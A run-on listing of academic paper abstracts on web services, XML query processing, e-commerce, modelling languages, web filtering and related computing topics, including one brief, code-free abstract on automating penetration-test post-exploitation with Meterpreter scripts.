This paper aims to report work on achieving semantic interoperability in electronic auctions. In particular, it considers the advantages and drawbacks of using hard‐coding and using semantic messages in the communication between the auction system and the participants of the auction.
Design/methodology/approach
It is demonstrated that although XML‐documents are commonly used for information exchange they do not provide any means of talking about the semantics (i.e. meaning) data. It is also shown that by expressing exchanged documents by resource description framework (RDF) the semantics of the messages can be captured in the message.
Findings
It is recognized that hard‐coding is proven to be a valuable and powerful way for an exchange of structured and persistent business documents (messages). However, if we use hard‐coding in the case of non‐persistent documents and non‐static markets we will encounter problems in deploying new auction policies and extending the system by new participants.
Practical implications
The introduction of the RDF‐technology in message exchange is challenging as it incorporates Semantic web technologies into many parts of the auction system, e.g. on data stores and query languages. The introduction of this technology is also an investment. The investment on new Semantic web technology includes a variety of costs including software, hardware and training costs.
Originality/value
By automating electronic auctions both buyers and sellers can benefit as they can achieve cost reductions and shorten the duration of the auction processes. Also new auction formats can be easily deployed.
Purpose
– This paper aims to address formal testing of real‐time systems by providing readers with guidance for generating test cases from timed automata.
Design/methodology/approach
– In this paper, a set of test selection criteria is presented. Such criteria are useful for testing real‐time systems specified by timed automata. The criteria are introduced after the presentation of timed automata model and the concepts related to it.
Findings
– The paper finds that the set of test selection criteria are ordered based on the inclusion relation. The ordering is useful for developing new testing methods and for comparing existing approaches.
Originality/value
– Each of the proposed test selection criteria can be used to develop a new method for testing timed automata with certain fault coverage.
Purpose
The growth of the web and the increasing number of documents electronically available has been paralleled by the emergence of harmful web pages content such as pornography, violence, racism, etc. This emergence involved the necessity of providing filtering systems designed to secure the internet access. Most of them process mainly the adult content and focus on blocking pornography, marginalizing violence. The purpose of this paper is to propose a violent web content detection and filtering system, which uses textual and structural content‐based analysis.
Design/methodology/approach
The violent web content detection and filtering system uses textual and structural content‐based analysis based on a violent keyword dictionary. The paper focuses on the keyword dictionary preparation, and presents a comparative study of different data mining techniques to block violent content web pages.
Findings
The solution presented in this paper showed its effectiveness by scoring a 89 per cent classification accuracy rate on its test data set.
Research limitations/implications
Many future work directions can be considered. This paper analyzed only the web page, and an additional analysis of the visual content can be one of the directions of future work. Future research is underway to develop effective filtering tools for other types of harmful web pages, such as racist, etc.
Originality/value
The paper's major contributions are first, the study and comparison of several decision tree building algorithms to build a violent web classifier based on a textual and structural content‐based analysis for improving web filtering. Second, showing laborious dictionary building by finding automatically discriminative indicative keywords.
Purpose
The definition of modeling languages is a key‐prerequisite for model‐driven engineering. In this respect, Domain‐Specific Modeling Languages (DSMLs) defined from scratch in terms of metamodels and the extension of Unified Modeling Language (UML) by profiles are the proposed options. For interoperability reasons, however, the need arises to bridge modeling languages originally defined as DSMLs to UML. Therefore, the paper aims to propose a semi‐automatic approach for bridging DSMLs and UML by employing model‐driven techniques.
Design/methodology/approach
The paper discusses problems of the ad hoc integration of DSMLs and UML and from this discussion a systematic and semi‐automatic integration approach consisting of two phases is derived. In the first phase, the correspondences between the modeling concepts of the DSML and UML are defined manually. In the second phase, these correspondences are used for automatically producing UML profiles to represent the domain‐specific modeling concepts in UML and model transformations for transforming DSML models to UML models and vice versa. The paper presents the ideas within a case study for bridging ComputerAssociate's DSML of the AllFusion Gen CASE tool with IBM's Rational Software Modeler for UML.
Findings
The ad hoc definition of UML profiles and model transformations for achieving interoperability is typically a tedious and error‐prone task. By employing a semi‐automatic approach one gains several advantages. First, the integrator only has to deal with the correspondences between the DSML and UML on a conceptual level. Second, all repetitive integration tasks are automated by using model transformations. Third, well‐defined guidelines support the systematic and comprehensible integration.
Research limitations/implications
The paper focuses on the integrating direction DSMLs to UML, but not on how to derive a DSML defined in terms of a metamodel from a UML profile.
Originality/value
Although, DSMLs defined as metamodels and UML profiles are frequently applied in practice, only few attempts have been made to provide interoperability between these two worlds. The contribution of this paper is to integrate the so far competing worlds of DSMLs and UML by proposing a semi‐automatic approach, which allows exchanging models between these two worlds without loss of information.
Pentesting is becoming an important activity even for smaller companies. One of the most important economic pressures is the
cost of such tests. In order to automate pentests, tools such as Metasploit can be used. Post-exploitation activities can,
however, not be automated easily. Our contribution is to extend Meterpreter-scripts so that post-exploitation can be scripted.
Moreover, using a multi-step approach (pivoting), we can automatically exploit machines that are not directly routable: Once
the first machine is exploited, the script continues to then automatically launch an attack on the next machine, etc.
Purpose
In any critical system, high‐availability of software components like web services has so far been achieved through replication. Three replication strategies known as active, passive, and hybrid, describe for example how many replicas are needed, where to locate replicas, and how replicas interact with the original web service and among themselves if needed. The purpose of this paper is to show how replicates could be substituted with components that are similarly functional to the component that needs back‐up in case of failure.
Design/methodology/approach
After examination of the different existing replication strategies, it was decided to test the suitability of the proposed web services high‐availability approach based on communities for each strategy. To this end, the specification of web services using two behaviors, namely control and operational, was deemed appropriate.
Findings
The active replication strategy is the only strategy that could support the development of a web services high‐availability approach based on communities of web services.
Practical implications
The proposed approach has been validated in practice by deploying a JXTA‐based testbed. The experimental work has implemented the active replication strategy.
Originality/value
Software component high‐availability could be achieved by components that are similarly functional to this component, which permits the common limitations of existing replication strategies to be addressed.
Purpose
This survey aims to study and analyze current techniques and methods for context‐aware web service systems, to discuss future trends and propose further steps on making web services systems context‐aware.
Design/methodology/approach
The paper analyzes and compares existing context‐aware web service‐based systems based on techniques they support, such as context information modeling, context sensing, distribution, security and privacy, and adaptation techniques. Existing systems are also examined in terms of application domains, system type, mobility support, multi‐organization support and level of web services implementation.
Findings
Supporting context‐aware web service‐based systems is increasing. It is hard to find a truly context‐aware web service‐based system that is interoperable and secure, and operates on multi‐organizational environments. Various issues, such as distributed context management, context‐aware service modeling and engineering, context reasoning and quality of context, security and privacy issues have not been well addressed.
Research limitations/implications
The number of systems analyzed is limited. Furthermore, the survey is based on published papers. Therefore, up‐to‐date information and development might not be taken into account.
Originality/value
Existing surveys do not focus on context‐awareness techniques for web services. This paper helps to understand the state of the art in context‐aware techniques for web services that can be employed in the future of services which is built around, amongst others, mobile devices, web services, and pervasive environments.
Purpose
In the last decade, web services have become a major technology to implement loosely coupled business processes and perform application integration. Through the use of context, a new generation of web services, namely context‐aware web services (CASs), is currently emerging as an important technology for building innovative context‐aware applications. Unfortunately, CASs are still difficult to build. Issues like lack of context provisioning management approach and lack of generic approach for formalizing the development process need to be solved in the first place for easy and effective development of CASs. The purpose of this paper is to investigate the techniques on developing CASs.
Design/methodology/approach
The paper focuses on introducing a model‐driven platform, called ContextServ, and showcasing how to use this platform to rapidly develop a context‐aware web application, Smart Adelaide Guide. ContextServ adopts a model‐driven development (MDD) approach where a Unified Modeling Language (UML)‐based modeling language – ContextUML – is used to model web services and its context‐awareness features.
Findings
The paper presents novel techniques for efficient and effective development of CASs using a MDD approach. The ContextServ platform is the only one that provides a comprehensive software toolset that supports graphical modeling and automatic model transformation of CASs.
Practical implications
The proposed approach has been validated in practice by developing various CASs. The experimental study demonstrates the efficiency and effectiveness of the approach.
Originality/value
The paper presents a novel platform called ContextServ, which offers a set of visual editing and automation tools for easy and fast generating and deploying CASs.
Prior to conducting business via the Web, business partners agree on the business processes they are able to support. In ebXML, the choreography of these business processes is described as an instance of the so-called business process specification schema (BPSS). For execution purposes the BPSS must be defined in the exact business context of the partnership. Reference models for B2B processes developed by standard
organizations usually span over multiple business contexts to avoid a multitude of similar processes. In this paper we present how business collaboration models following the UN/CEFACT Modeling Methodology (UMM) are expressed in ebXML BPSS. To allow a mapping from multi-context business collaboration models to a context-specific choreography in ebXML BPSS we extend UMM to capture constraints for different business contexts
Purpose – Tree pattern is at the core of XML queries. The tree patterns in XML queries typically contain redundancies, especially when broad integrity constraints (ICs) are present and considered. Apparently, tree pattern minimization has great significance for efficient XML query processing. Although various minimization schemes/algorithms have been proposed, none of them can exploit broad ICs for thoroughly minimizing the tree patterns in XML queries. The purpose of this research is to develop an innovative minimization scheme and provide a novel implementation algorithm. Design/methodology/approach – Query augmentation/expansion was taken as a necessary first-step by most prior approaches to acquire XML query pattern minimization under the presence of certain ICs. The adopted augmentation/expansion is also the course for the typical O(n4) time-complexity of the proposed algorithms. This paper presents an innovative approach called allying to effectively circumvent the otherwise necessary augmentation step and to retain the time complexity of the implementation algorithm within the optimal, i.e. O(n2). Meanwhile, the graph simulation concept is adapted and generalized to a three-tier definition scheme so that broader ICs are incorporated. Findings – The innovative allying minimization approach is identified and an effective implementation algorithm named AlliedMinimize is developed. This algorithm is both runtime optimal – taking O(n2) time – and most powerful in terms of the broadness of constraints it can exploit for XML query pattern minimization. Experimental study confirms the validity of the proposed approach and algorithm. Research limitations/implications – Though the algorithm AlliedMinimize is so far the most powerful XML query pattern minimization algorithm, it does not incorporate all potential ICs existing in the context of XML. Effectively integrating this innovative minimization scheme into a fully-fledged XML query optimizer remains to be investigated in the future. Practical implications – In practice, Allying and AlliedMinimize can be used to achieve a kind of quick optimization for XML queries via fast minimization of the tree patterns involved in XML queries under broad ICs. Originality/value – This paper presents a novel scheme and an efficient algorithm for XML query pattern minimization under broad ICs.
Purpose
It has become common for children to browse web pages. However, there is no web browser that takes into account children's characteristics on information acquisition. Therefore, even though such general pages have a variety and detailed information, children cannot effectively use the internet with current web browsers, e.g. they have difficulty in understanding the contents and easily get bored when browsing general pages. The purpose of this paper is to propose a children‐oriented web browser, which aims to keep children's interest on pages and help them understand the contents of the pages.
Design/methodology/approach
The paper designed and implemented a web browser for children using a bubble metaphor, which converts general pages into a children‐friendly presentation. The browser is displayed in an undersea scene and presents contents of a web page in bubbles of different sizes, speeds, and colors. Furthermore, it presents the details of the content in a picture book style in a way that children can easily understand.
Findings
The paper conducts a user experiment with 13 children between four and ten years of age. The experimental results show that the browser changes general pages into a children‐friendly presentation and make a web browsing fun for children.
Originality/value
To the best of the authors' knowledge, this is the first investigation into the web browsing characteristics of children. The findings may be useful to researchers who are interested in the relationships between children and the web, as well as information acquisition of children.
A method for improving the retrieval effectiveness of a search engine by employing a website directory, e.g., Yahoo! Japan directory or Google directory, as a concept dictionary is proposed. A user can examine the results of a search engine from the top rank as usual except that he/she is assisted by a suggestion about which webpages are worthy of examination. To make a suggestion the conceptual closeness of an unexamined webpage to a query or to each of the webpages that a user has been interested in is calculated via a website directory. The proposed method was evaluated on the search results of Japanese Excite.
Web services refer to a specific set of technologies used to implement a Service Oriented Architecture. Thanks to maturing Web-services standards, and to new mobile devices and application solutions, progress is being made in presenting similar Web-services offerings in both mobile and fixed networks. To bring that architecture and the solutions it will support to the world of mobility is indeed a significant issue in m-business applications, because mobile Web services present various advantages: Reduction of the overall cost of development (by reusing existing system components), faster time to market introduction of products (provided by applications’ rapid development and deployment) and remarkable possibilities to emerge new applications with increased functionalities. In addition, the new and forthcoming mobile networks, with native IP connection and high speed transmission capability, allow the development of a variety of modern multimedia services. Multimedia Messaging Services (capable to mix the media types in order to enable more intuitive messaging operation), and Instant Messaging and Presence Services (dedicated for presence, instant messaging, and distribution and sharing of multimedia content in groups of users), provide suitable underlying capabilities to support location-based and context-sensitive multimedia services. In this paper we will present the current approaches regarding architectural, functional and security features that allow enterprises to enjoy the benefits of traditional Web services in the mobile multimedia domain.
Encouraging socio-economic development in developing countries has resulted in many changes in the lifestyle of communities. Changes in dietary patterns are one of the main outcomes from the rapid socio-economics advancement, for example excessive intake of fat, high-protein diet (animal protein), salt and preservatives. Chronic diseases such as diabetes, coronary artery disease, hypertension and cancer are mostly related to diet. With the community becoming more nutrition and health conscious, one of the challenges faced is to make sure that the information and knowledge on diet and healthy lifestyle gets across to the community. This paper presents a model of web-based diet system (WebDIET) that attempts to make diet information and menu plans that are customised to local preference more accessible via the use of Internet. The system is to be used by dieticians who serve as administrators and the public who are the end users. The dietary standard adapted in developing the system is Recommended Dietary Allowances (RDA) for Malaysia. The Malaysian Dietary Guidelines was also referred as it emphasises on Malaysian diet. The system consists of six modules namely Authentication Module, Menu Plan Module, Diabetic Menu Plan Module, Food Selection Module, Disease Info Module and Feedback Module. Diabetic menu plan module models the reasoning process employed by dieticians in suggesting menu plans. The planning task is solved using an artificial intelligence technique through the case-based reasoning (CBR) approach. CBR, generally describes, the process of solving the current problem based on the proposed solution of similar problems in the past. Nearest Neighbour Algorithm was used to compute the similarities in weighted average. Tools used for the development of the system are Microsoft Visual Interdev, Microsoft FrontPage 2000, while HTML, VBScript and JavaScript are the scripting languages used to develop the system.
With the rise of mobile devices like cellphones and Personal Digital Assistants (PDAs) in the last years, the demand for specialized mobile solutions grows. Newly defined protocols like WAP or i-Mode can be used to adapt Internet appearances to mobile devices. However, it is often an elaborate work to achieve these adaptions as almost all pages have to be rewritten. This paper shows an approach of semi automatical page generation for mobile devices. It is assumed that a general HTML page is already existing. Based on this page, an approach of generating personalized mobile device compatible pages is shown. This approach is illustrated using the software eSarine. eSarine is an e-shop softare that can be used to set up an electronic shop.
Purpose - To measure the exact size of the world wide web (i.e. a census). The measure used is the number of publicly accessible web servers on port 80. Design/methodology/approach - Every IP address on the internet is queried for the presence of a web server. Findings - The census found 18,560,257 web servers. Research limitations/implications - Any web servers hidden behind a firewall, or that did not respond within a reasonable amount of time (20 seconds) were not counted by the census. Practical implications - Whenever a server is found, we download and store a copy of its homepage. The resulting database of homepages is a historical snapshot of the web which will be mined for information in the future. Originality/value - Past web surveys performed by various research groups were only estimates of the size of the web. This is the first time its size has been exactly measured.
Purpose
Engines have been built that execute queries against XML data. The aim of this paper is to describe a novel technique that can be used to improve the speed of execution of the queries based on semantics of the data in the XML document.
Design/methodology/approach
The paper formally introduces algorithms for optimizing XML queries, implement the algorithms, and through experimentation demonstrate the improvement in speed.
Findings
Three possible semantic query optimizations based on the values of elements were introduced and these demonstrate that two of the three optimizations improve query performance but the third does not. It is hypothesized why this is the case.
Research limitations/implications
A limitation is obviously the query engine and how it works. Future work includes, executing the experiments on a different engine and comparing results, building a system to automatically generate the characteristics that are necessary to do the optimization, describing the best way to represent and maintain the characteristics once they are found, compare the results of optimizations based on content with optimizations based on structure.
Practical implications
The optimizations could be incorporated into new query engines.
Originality/value
Novel algorithms for query optimization have been developed and proven to work. They are of value to people who are building database systems for XML data.